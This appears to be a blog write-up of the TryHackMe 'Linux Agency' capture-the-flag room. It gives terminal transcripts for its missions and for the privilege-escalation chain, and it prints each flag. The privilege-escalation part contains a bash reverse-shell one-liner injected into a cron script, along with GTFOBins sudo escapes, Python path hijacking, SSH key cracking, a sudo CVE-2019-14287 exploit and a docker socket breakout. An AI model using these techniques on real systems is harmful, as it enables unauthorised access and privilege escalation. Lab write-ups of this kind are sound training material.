mission26@linuxagency:/home$ cd mission26
mission26@linuxagency:~$ ls -la
total 100
drwxr-x---  2 mission26 mission26  4096 Jan 12  2021 .
drwxr-xr-x 45 root      root       4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission26 mission26     9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission26 mission26  3771 Jan 12  2021 .bashrc
-r--------  1 mission26 mission26 85980 Jan 12  2021 flag.jpg
-rw-r--r--  1 mission26 mission26   807 Jan 12  2021 .profile
mission26@linuxagency:~$ strings flag.jpg 
JFIF
-mission27{444d29b932124a48e7dddc0595788f4d}
 , #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
RYBP
^C^rP
!aVP
`X*P

--- snipped ---

mission 27 flag

mission27{444d29b932124a48e7dddc0595788f4d}

Question 28 – What is the mission28 flag?

  • For this task, we have a long file name with multiple extensions. In reality, these multiple extensions are only to distract us. We have to only decode the last extension that is .gz. I used the gunzip to do that. Once decoded, we are presented with a png file. Used the strings command again to reveal the flag.

mission26@linuxagency:~$ su mission27
Password: 
mission27@linuxagency:/home/mission26$ cd ..
mission27@linuxagency:/home$ cd mission27
mission27@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission27 mission27 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission27 mission27    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission27 mission27 3771 Jan 12  2021 .bashrc
-rw-r--r--  1 mission27 mission27  136 Jan 12  2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
-rw-r--r--  1 mission27 mission27  807 Jan 12  2021 .profile
s.zip.gz.jpg.png.gz y:~$ gunzip flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css
mission27@linuxagency:~$ ls -l
total 4
-rw-r--r-- 1 mission27 mission27 51 Jan 12  2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
ss.zip.gz.jpg.png ncy:~$ strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.cs
GIF87a
mission28{03556f8ca983ef4dc26d2055aef9770f}
mission27@linuxagency:~$ 

mission 28 flag

mission28{03556f8ca983ef4dc26d2055aef9770f}

Question 29 – What is the mission29 flag?

  • In this one, we are welcomed by a ruby interpreter as soon as we login. Further, we break the interactive session using exec command to spawn the bash shell. Finally got txt.galf which holds the flag but in reverse condition. Reverse the same to get the flag using cyberchef.

mission27@linuxagency:~$ su mission28
Password: 

irb(main):002:0> exec "/bin/bash"
mission28@linuxagency:/home/mission27$ cd ..
mission28@linuxagency:/home$ cd mission28
mission28@linuxagency:~$ ls 
examples.desktop  txt.galf
mission28@linuxagency:~$ ls -la
total 40
drwxr-x---  3 mission28 mission28 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission28 mission28    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission28 mission28  220 Jan 12  2021 .bash_logout
-rw-r--r--  1 mission28 mission28 3771 Jan 12  2021 .bashrc
-rw-r--r--  1 mission28 mission28 8980 Jan 12  2021 examples.desktop
drwxr-xr-x  3 mission28 mission28 4096 Jan 12  2021 .local
-rw-r--r--  1 mission28 mission28  807 Jan 12  2021 .profile
-r--------  1 mission28 mission28   44 Jan 12  2021 txt.galf
mission28@linuxagency:~$ cat txt.galf 
}1fff2ad47eb52e68523621b8d50b2918{92noissim
mission28@linuxagency:~$ 

mission 29 flag

Cyberchef Reverse

mission29{8192b05d8b12632586e25be74da2fff1}

Question 30 – What is the mission30 flag?

  • Moving onto this task, we found a folder named bludit. Got inside it and access the .htpasswd file which gives us our password.

mission28@linuxagency:~$ su mission29
Password: 
mission29@linuxagency:/home/mission28$ cd ..
mission29@linuxagency:/home$ cd mission29
mission29@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission29 mission29 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission29 mission29    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission29 mission29 3771 Jan 12  2021 .bashrc
drwxr-xr-x  7 mission29 mission29 4096 Jan 12  2021 bludit
-rw-r--r--  1 mission29 mission29  807 Jan 12  2021 .profile
mission29@linuxagency:~$ cd bludit/
mission29@linuxagency:~/bludit$ ls -la
total 44
drwxr-xr-x  7 mission29 mission29 4096 Jan 12  2021 .
drwxr-x---  3 mission29 mission29 4096 Jan 12  2021 ..
drwxr-xr-x  2 mission29 mission29 4096 Jan 12  2021 bl-content
drwxr-xr-x 10 mission29 mission29 4096 Jan 12  2021 bl-kernel
drwxr-xr-x  2 mission29 mission29 4096 Jan 12  2021 bl-languages
drwxr-xr-x 27 mission29 mission29 4096 Jan 12  2021 bl-plugins
drwxr-xr-x  4 mission29 mission29 4096 Jan 12  2021 bl-themes
-rw-r--r--  1 mission29 mission29  394 Jan 12  2021 .htaccess
-rw-r--r--  1 mission29 mission29   44 Jan 12  2021 .htpasswd
-rw-r--r--  1 mission29 mission29  900 Jan 12  2021 index.php
-rw-r--r--  1 mission29 mission29 1083 Jan 12  2021 LICENSE

mission29@linuxagency:~/bludit$ cat .htaccess 
AddDefaultCharset UTF-8

<IfModule mod_rewrite.c>

# Enable rewrite rules
RewriteEngine on

# Base directory
#RewriteBase /

# Deny direct access to the next directories
RewriteRule ^bl-content/(databases|workspaces|pages|tmp)/.*$ - [R=404,L]

# All URL process by index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php [PT,L]

</IfModule>mission29@linuxagency:~/bludit$ cat .htpasswd 
mission30{d25b4c9fac38411d2fcb4796171bda6e}
mission29@linuxagency:~/bludit$ 

mission 29
mission 30 flag

mission30{d25b4c9fac38411d2fcb4796171bda6e}

Question 31 – What is viktor’s Flag?

  • For this one, we moved to the escalator folder and found a folder name .git. Used the same to reveal the log file.

mission29@linuxagency:/home$ su mission30
Password: 
mission30@linuxagency:/home$ cd mission30
mission30@linuxagency:~$ ls -la
total 36
drwxr-x---  3 mission30 mission30 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission30 mission30    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission30 mission30  220 Jan 12  2021 .bash_logout
-rw-r--r--  1 mission30 mission30 3771 Jan 12  2021 .bashrc
drwxr-xr-x  3 mission30 mission30 4096 Jan 12  2021 Escalator
-rw-r--r--  1 mission30 mission30 8980 Jan 12  2021 examples.desktop
-rw-r--r--  1 mission30 mission30  807 Jan 12  2021 .profile
mission30@linuxagency:~$ cd Escalator/
mission30@linuxagency:~/Escalator$ ls -l
total 4
-rw-r--r-- 1 mission30 mission30 35 Jan 12  2021 sources.py
mission30@linuxagency:~/Escalator$ cat sources.py 

mission30@linuxagency:~/Escalator/.git$ git log 
commit 24cbf44a9cb0e65883b3f76ef5533a2b2ef96497 (HEAD -> master, origin/master)
Author: root <root@Xyan1d3>
Date:   Mon Jan 11 15:37:56 2021 +0530

    My 1st python Script

commit e0b807dbeb5aba190d6307f072abb60b34425d44
Author: root <root@Xyan1d3>
Date:   Mon Jan 11 15:36:40 2021 +0530

    Your flag is viktor{b52c60124c0f8f85fe647021122b3d9a}

mission 30

viktor flag

viktor{b52c60124c0f8f85fe647021122b3d9a}

Task 3 - Linux Fundamentals 1

Task 3 - Linux Fundamentals 2

Task 3 - Linux Fundamentals 3

Task 3 - Linux Fundamentals 4

Task 4 – Privilege Escalation

Question 1 – su into viktor user using viktor’s flag as password

Done

Question 2 – What is dalia’s flag?

  • As checked the cronjobs entry using crontab, i found one for dalia where a script was running with her privileges. We can exploit it as it is writable by our current user viktor. We have to inject our reverse shell into the file to get a shell at our attacking machine. For this, you have to perform a hit or miss approach as the script changes on its own. For this, i have spam the reverse shell one-liner into the script rapidly and on the particular time to get the reverse shell and the flag.

viktor@linuxagency:/home$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *	* * *	dalia	sleep 30;/opt/scripts/47.sh
*  *	* * *	root	echo "IyEvYmluL2Jhc2gKI2VjaG8gIkhlbGxvIDQ3IgpybSAtcmYgL2Rldi9zaG0vCiNlY2hvICJIZXJlIHRpbWUgaXMgYSBncmVhdCBtYXR0ZXIgb2YgZXNzZW5jZSIKcm0gLXJmIC90bXAvCg==" | base64 -d > /opt/scripts/47.sh;chown viktor:viktor /opt/scripts/47.sh;chmod +x /opt/scripts/47.sh;

viktor@linuxagency:/opt/scripts$ cat 47.sh 
#!/bin/bash
#echo "Hello 47"
rm -rf /dev/shm/
#echo "Here time is a great matter of essence"
rm -rf /tmp/
bash -i >& /dev/tcp/10.18.11.103/1234 0>&1
viktor@linuxagency:/opt/scripts$ echo "bash -i >& /dev/tcp/10.18.11.103/1234 0>&1">> 47.sh


wh1terose@fsociety:~$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.62.203 53916
bash: cannot set terminal process group (5082): Inappropriate ioctl for device
bash: no job control in this shell
dalia@linuxagency:~$ ls
ls
examples.desktop
flag.txt
dalia@linuxagency:~$ cat flag.txt
cat flag.txt
dalia{4a94a7a7bb4a819a63a33979926c77dc}
dalia@linuxagency:~$ 

crontab

47.sh and Gun-Shop.py

reverse shell

dalia flag

dalia{4a94a7a7bb4a819a63a33979926c77dc}

Question 3 – What is silvio’s flag?

  • For this one, we checked the sudo misconfiguration on the server and as per the output, the user silvio can run zip binary with elevate privileges. Uses the same exploit from GTFObins and captured the flag.

dalia@linuxagency:/home$ sudo -l
Matching Defaults entries for dalia on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dalia may run the following commands on linuxagency:
    (silvio) NOPASSWD: /usr/bin/zip
dalia@linuxagency:/home$ TF=$(mktemp -u)
dalia@linuxagency:/home$ sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'

$ id
uid=1032(silvio) gid=1032(silvio) groups=1032(silvio)
$ python -c 'import pty;pty.spawn("/bin/bash")'
silvio@linuxagency:/home$ cd silvio/
silvio@linuxagency:~$ ls
examples.desktop  flag.txt
silvio@linuxagency:~$ cat flag.txt 
silvio{657b4d058c03ab9988875bc937f9c2ef}
silvio@linuxagency:~

silvio flag

silvio{657b4d058c03ab9988875bc937f9c2ef}

Question 4 – What is reza’s flag?

  • Next up we have reza, we tried to check the sudo misconfigurations again and found one in the git binary. To exploit it used GTFObins again. Run the exploit as reza got the user’s shell and flag.

silvio@linuxagency:~$ sudo -l
Matching Defaults entries for silvio on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User silvio may run the following commands on linuxagency:
    (reza) SETENV: NOPASSWD: /usr/bin/git

silvio@linuxagency:~$ sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
$ id
uid=1033(reza) gid=1033(reza) groups=1033(reza)
$ python -c 'import pty;pty.spawn("/bin/bash")'
reza@linuxagency:/home/silvio$ cd ..
reza@linuxagency:/home$ cd reza/
reza@linuxagency:~$ ls
examples.desktop  flag.txt
reza@linuxagency:~$ cat fla
cat: fla: No such file or directory
reza@linuxagency:~$ cat flag.txt 
reza{2f1901644eda75306f3142d837b80d3e}
reza@linuxagency:~$ 

sudo -l

GTFObins Sudo

reza flag

reza{2f1901644eda75306f3142d837b80d3e}

Question 5 – What is jordan’s flag?

  • Well, this was a pain in the ass for a moment. We have to exploit the python module in this by leveraging path hijacking vulnerability. The Gun-shop.py file requires a shop.py module to run. We can insert a reverse shell in shop.py and execute it with the help of the main file to get the shell. For the flag, we have to reverse it, i have used cyberchef for it.

reza@linuxagency:/home$ sudo -l
Matching Defaults entries for reza on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User reza may run the following commands on linuxagency:
    (jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py

reza@linuxagency:/tmp$ touch shop.py
reza@linuxagency:/tmp$ echo "import os" > shop.py               
reza@linuxagency:/tmp$ echo "os.system('/bin/bash')" >> shop.py 
reza@linuxagency:/tmp$ cat shop.py 
import os
os.system('/bin/bash')
reza@linuxagency:/tmp$ sudo -u jordan PYTHONPATH=/tmp/ /opt/scripts/Gun-Shop.py
jordan@linuxagency:/tmp$ cat /home/jordan/flag.txt 
}3c3e9f8796493b98285b9c13c3b4cbcf{nadroj
jordan@linuxagency:/tmp$ 

sudo -l

jordon flag

Cyberchef Reverse

jordan{fcbc4b3c31c9b58289b3946978f9e3c3}

Question 6 – What is ken’s flag?

  • We checked again for any sudo misconfigurations. Found out that the binary less can be used by user ken without any password. So, read the flag using the less binary with the privileges of user “ken”. For the shell access, used GTFObins again and got shell for ken using less.

jordan@linuxagency:/tmp$ sudo -l
Matching Defaults entries for jordan on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jordan may run the following commands on linuxagency:
    (ken) NOPASSWD: /usr/bin/less
jordan@linuxagency:/tmp$ sudo -u ken /usr/bin/less /home/ken/flag.txt
WARNING: terminal is not fully functional
ken{4115bf456d1aaf012ed4550c418ba99f}
/home/ken/flag.txt (END)


jordan@linuxagency:/tmp$ sudo -u ken less /etc/profile
WARNING: terminal is not fully functional
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

if [ "${PS1-}" ]; then
  if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
    # The file bash.bashrc already sets the default PS1.
    # PS1='\h:\w\$ '
    if [ -f /etc/bash.bashrc ]; then
      . /etc/bash.bashrc
    fi
  else
    if [ "`id -u`" -eq 0 ]; then
      PS1='# '
    else
      PS1='$ '
    fi
  fi
fi

if [ -d /etc/profile.d ]; then
  for i in /etc/profile.d/*.sh; do
    if [ -r $i ]; then
      . $i
!/bin/shfile
$ id
uid=1036(ken) gid=1036(ken) groups=1036(ken)
$ python -c 'import pty;pty.spawn("/bin/bash")'
ken@linuxagency:/tmp$ 

ken flag

ken shell

ken{4115bf456d1aaf012ed4550c418ba99f}

Question 7 – What is sean’s flag?

  • To get the flag for sean, we exploited the vim binary to get the reverse shell however the flag was not under the home directory of the user. After a little bit research, found out that the user belongs to the ADM group and the flag might reside in /var/log. Using grep to filter out anything useful, we got our flag. Along with that, we found another string encoded in base64, which once decoded reveal password of penelope.

ken@linuxagency:/tmp$ sudo -l
Matching Defaults entries for ken on linuxagency:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ken may run the following commands on linuxagency:
    (sean) NOPASSWD: /usr/bin/vim
ken@linuxagency:/tmp$ sudo -u sean vim -c ':!/bin/sh'

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'

:!/bin/sh
$ id
uid=1037(sean) gid=1037(sean) groups=1037(sean),4(adm)
$ python -c 'import pty;pty.spawn("/bin/bash")'
sean@linuxagency:/tmp$ cd /home/sean/     
sean@linuxagency:~$ ls
examples.desktop


sean@linuxagency:/var/log$ grep -rn “sean{“ /var/log 2>/dev/null    
sean@linuxagency:/var/log$ grep -R sean ./* 2>/dev/null
./auth.log:Jun 20 11:22:15 localhost sudo:      ken : TTY=pts/0 ; PWD=/tmp ; USER=sean ; COMMAND=/usr/bin/vim -c :!/bin/sh
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1036.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/system.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1037.journal matches
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog.bak:Jan 12 02:58:58 ubuntu kernel: [    0.000000] ACPI: LAPIC_NMI (acpi_id[0x6d] high edge lint[0x1]) : sean{4c5685f4db7966a43cf8e95859801281} VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==
sean@linuxagency:/var/log$ 

sudo -l

stabilizing the shell

sean flag

Cyberchef Base 64 decode

sean{4c5685f4db7966a43cf8e95859801281}

Question 8 – What is penelope’s flag?

  • With the help of the password, we found in our last task. Log into the SSH server and switch the user to penelope with the password – p3nelope and find the flag in the user’s home directory.

agent47@linuxagency:~$ su penelope
Password: 
penelope@linuxagency:/home/agent47$ cd ..
penelope@linuxagency:/home$ cd penelope/
penelope@linuxagency:~$ ls -la
total 80
drwxr-x---  3 penelope penelope  4096 Jan 12  2021 .
drwxr-xr-x 45 root     root      4096 Jan 12  2021 ..
-rwsr-sr-x  1 maya     maya     39096 Jan 12  2021 base64
lrwxrwxrwx  1 penelope penelope     9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 penelope penelope   220 Jan 12  2021 .bash_logout
-rw-r--r--  1 penelope penelope  3771 Jan 12  2021 .bashrc
-rw-r--r--  1 penelope penelope  8980 Jan 12  2021 examples.desktop
-r--------  1 penelope penelope    43 Jan 12  2021 flag.txt
drwx------  3 penelope penelope  4096 Jan 12  2021 .gnupg
-rw-r--r--  1 penelope penelope   807 Jan 12  2021 .profile
penelope@linuxagency:~$ cat flag.txt 
penelope{2da1c2e9d2bd0004556ae9e107c1d222}
penelope@linuxagency:~$ 

penelope flag

penelope{2da1c2e9d2bd0004556ae9e107c1d222}

Question 9 – What is maya’s flag?

  • As per the above screenshot of the directory listing for user penelope, we can see a base64 binary that has permissions for user maya and a SUID bit set. I used GTFObins to exploit this binary to read the flag from maya’s home directory.

penelope@linuxagency:~$ ls -la
total 80
drwxr-x---  3 penelope penelope  4096 Jan 12  2021 .
drwxr-xr-x 45 root     root      4096 Jan 12  2021 ..
-rwsr-sr-x  1 maya     maya     39096 Jan 12  2021 base64
lrwxrwxrwx  1 penelope penelope     9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 penelope penelope   220 Jan 12  2021 .bash_logout
-rw-r--r--  1 penelope penelope  3771 Jan 12  2021 .bashrc
-rw-r--r--  1 penelope penelope  8980 Jan 12  2021 examples.desktop
-r--------  1 penelope penelope    43 Jan 12  2021 flag.txt
drwx------  3 penelope penelope  4096 Jan 12  2021 .gnupg
-rw-r--r--  1 penelope penelope   807 Jan 12  2021 .profile

penelope@linuxagency:~$ LFILE=/home/maya/flag.txt
penelope@linuxagency:~$ ./base64 "$LFILE" | base64 --decode
maya{a66e159374b98f64f89f7c8d458ebb2b}
penelope@linuxagency:~$ 

penelope directory

GTFObins SUID

maya flag

maya{a66e159374b98f64f89f7c8d458ebb2b}

Question 10 – What is robert’s Passphrase?

  • Once we are in the maya’s home directory, we can see a file named elusive_targets.txt which reveals that Robert is illegally hacking into our server and we can gain access to his account with an old ssh password backup that we can see in a directory called old_robert_ssh. Peeking into the directory reveals public and private key SSH key pairs of robert. I dumped the private key into the local machine and use SSH2john to convert the file into john crackable format. Firing up john on it reveals the password. – industryweapon

maya directory

cat elusive_targets.txt

SSH keys

root@ip-10-10-230-84:/opt/john# ./ssh2john.py id_rsa > id_rsa.hash

root@ip-10-10-230-84:/# john --wordlist=/usr/share/wordlists/rockyou.txt /opt/john/id_rsa.hash 
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
industryweapon   (id_rsa)
1g 0:00:00:16 DONE (2023-06-20 20:46) 0.06093g/s 873960p/s 873960c/s 873960C/s *7¡Vamos!
Session completed.

ssh2john.py
John cracking

industryweapon

Question 11 – What is user.txt?

  • Once I got the robert’s password, i tried to SSH into the server using the same but no luck. Then, on the maya’s shell, i tried to see the available routes and internal services that are running. There i found out that a port 2222 is running on 127.0.0.1 of the machine. I tried to SSH into it and got success. Now it was time to claim the user flag but it was just a troll.

maya@linuxagency:~$ ss -tulnp
Netid State   Recv-Q   Send-Q          Local Address:Port      Peer Address:Port  
udp   UNCONN  6144     0               127.0.0.53%lo:53             0.0.0.0:*     
udp   UNCONN  0        0           10.10.62.203%eth0:68             0.0.0.0:*     
udp   UNCONN  4992     0                     0.0.0.0:68             0.0.0.0:*     
udp   UNCONN  0        0                     0.0.0.0:631            0.0.0.0:*     
udp   UNCONN  25856    0                     0.0.0.0:5353           0.0.0.0:*     
udp   UNCONN  0        0                     0.0.0.0:59125          0.0.0.0:*     
udp   UNCONN  0        0                        [::]:47368             [::]:*     
udp   UNCONN  8448     0                        [::]:5353              [::]:*     
tcp   LISTEN  0        128                 127.0.0.1:2222           0.0.0.0:*     
tcp   LISTEN  0        128                 127.0.0.1:80             0.0.0.0:*     
tcp   LISTEN  0        128             127.0.0.53%lo:53             0.0.0.0:*     
tcp   LISTEN  0        128                   0.0.0.0:22             0.0.0.0:*     
tcp   LISTEN  0        5                   127.0.0.1:631            0.0.0.0:*     
tcp   LISTEN  0        128                 127.0.0.1:41791          0.0.0.0:*     
tcp   LISTEN  0        128                      [::]:22                [::]:*     
tcp   LISTEN  0        5                       [::1]:631               [::]:*     
maya@linuxagency:~$ ssh -p 2222 [email protected]
[email protected]'s password: 
Last login: Tue Jan 12 17:02:07 2021 from 172.17.0.1
robert@ec96850005d6:~$ ls
robert.txt
robert@ec96850005d6:~$ cat robert.txt 
You shall not pass from here!!!

I will not allow ICA to take over my world.

SSH tunneling

  • Next i tried to check if any sudo misconfiguration is there, found that all other than root can run /bin/bash command, this type of configuration i have seen before also. So, to cross check i downloaded the linpeas on the target machine and fired it up. Found out that the sudo version is vulnerable to CVE-2019-14287. With the one-liner, i got the root shell and claimed the user flag over there but root was still hiding somewhere.

vulnerable sudo version - Linpeas output

robert@ec96850005d6:/tmp$ sudo -u#-1 /bin/bash
root@ec96850005d6:/tmp# id
uid=0(root) gid=1000(robert) groups=1000(robert)
root@ec96850005d6:/tmp# cd /root
root@ec96850005d6:/root# ls
success.txt  user.txt
root@ec96850005d6:/root# cat user.txt 
user{620fb94d32470e1e9dcf8926481efc96}
root@ec96850005d6:/root# cat success.txt 
47 you made it!!!

You have made it, Robert has been taught a lesson not to mess with ICA.
Now, Return to our Agency back with some safe route.
All the previous door's have been closed.

Good Luck Amigo!
root@ec96850005d6:/root# 

user flag

user{620fb94d32470e1e9dcf8926481efc96}

Question 12 – What is root.txt?

  • The root flag was harder than the legs day in the gym. As per the hint given, it was talking about some Blue Whale, assuming that’s for the docker. So, i blindly copy-pasted the docker breakout commands from Hacktricks and eventually got the root shell. Moving into the root director reveals the root flag.

root@ec96850005d6:~# find / -name docker.sock 2>/dev/null
/run/docker.sock
root@ec96850005d6:~# /tmp/docker images #lucky they left this executable in the /tmp dir ;)
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
mangoman            latest              b5f279024ce0        2 years ago         213MB
root@ec96850005d6:~# /tmp/docker run -it -v /:/host/ mangoman chroot /host/ bash
root@e0c9b28abd75:/# ls
bin   cdrom  etc       home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  dev    flag.txt  initrd.img  lib             lost+found  mnt    proc  run   snap  swapfile  tmp  var
root@e0c9b28abd75:/# cd root/
root@e0c9b28abd75:~# ls
message.txt  root.txt
root@e0c9b28abd75:~# cat root.txt 
root{62ca2110ce7df377872dd9f0797f8476}
root@e0c9b28abd75:~# 

root flag

root{62ca2110ce7df377872dd9f0797f8476}

Task 4 - Privilege Escalation

Task 4 - Privilege Escalation 1

Also Read: Tryhackme – LazyAdmin

Conclusion:

Conclusion

So that was “Linux Agency” for you. Quite a long read, i must say. Well, Let’s sum up the room. We started with an initial SSH access on the box. Next, we solved a series of missions and got the flag for the user viktor. The privilege escalation consist of various users at each stage. Tried quite a few techniques and at last break out of the container to get the root flag and the freedom from the Big brother.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top